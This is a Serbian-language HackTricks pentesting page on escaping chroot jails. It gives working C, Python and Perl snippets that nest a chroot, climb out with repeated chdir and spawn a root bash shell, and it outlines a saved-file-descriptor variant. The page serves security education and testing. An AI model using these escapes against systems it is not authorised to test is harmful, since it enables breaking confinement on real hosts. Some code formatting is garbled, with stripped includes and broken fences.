Escaping from Jails

Naučite i vežbajte hakovanje AWS-a:HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE) Naučite i vežbajte hakovanje GCP-a: HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)

Podržite HackTricks

Proverite planove pretplate!
Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitteru 🐦 @hacktricks_live.
Podelite hakovanje trikova slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

GTFOBins

Pretražite https://gtfobins.github.io/ da biste videli da li možete izvršiti bilo koji binarni fajl sa "Shell" svojstvom

Bekstva iz Chroot-a

Sa vikija: Mehanizam chroot-a nije namenjen zaštiti od namernog menjanja od strane privilegovanih (root) korisnika. Na većini sistema, chroot konteksti se ne stapaju pravilno i programi u chroot-u sa dovoljnim privilegijama mogu izvršiti drugi chroot da bi izašli. Obično to znači da da biste pobegli morate biti root unutar chroot-a.

Alat chw00t je napravljen da zloupotrebi sledeće scenarije i pobegne iz chroot-a.

Root + Trenutni radni direktorijum

Ako ste root unutar chroot-a, možete pobeci kreiranjem još jednog chroot-a. To je zato što 2 chroot-a ne mogu koegzistirati (u Linuxu), pa ako kreirate folder i zatim napravite novi chroot u tom novom folderu dok ste vi van njega, sada ćete biti van novog chroot-a i stoga ćete biti u FS-u.

Ovo se dešava jer chroot OBICNO NE menja vaš trenutni radni direktorijum na naznačeni, tako da možete kreirati chroot ali biti van njega.

Obično nećete naći binarni fajl chroot unutar chroot zatvora, ali možete kompajlirati, otpremiti i izvršiti binarni fajl:

C: break_chroot.c

```c #include #include #include

//gcc break_chroot.c -o break_chroot

int main(void) { mkdir("chroot-dir", 0755); chroot("chroot-dir"); for(int i = 0; i < 1000; i++) { chdir(".."); } chroot("."); system("/bin/bash"); }

</details>

<details>

<summary>Python</summary>
```python
#!/usr/bin/python
import os
os.mkdir("chroot-dir")
os.chroot("chroot-dir")
for i in range(1000):
os.chdir("..")
os.chroot(".")
os.system("/bin/bash")

Perl

```perl #!/usr/bin/perl mkdir "chroot-dir"; chroot "chroot-dir"; foreach my $i (0..1000) { chdir ".." } chroot "."; system("/bin/bash"); ``` ### Root + Sačuvani fd

Ovo je slično prethodnom slučaju, ali u ovom slučaju napadač čuva file deskriptor trenutnog direktorijuma i zatim kreira chroot u novom folderu. Konačno, pošto ima pristup tom FD izvan chroot-a, pristupa mu i izlazi.

PreviousWeaponizing Distroless Nexteuid, ruid, suid

Last updated 1 month ago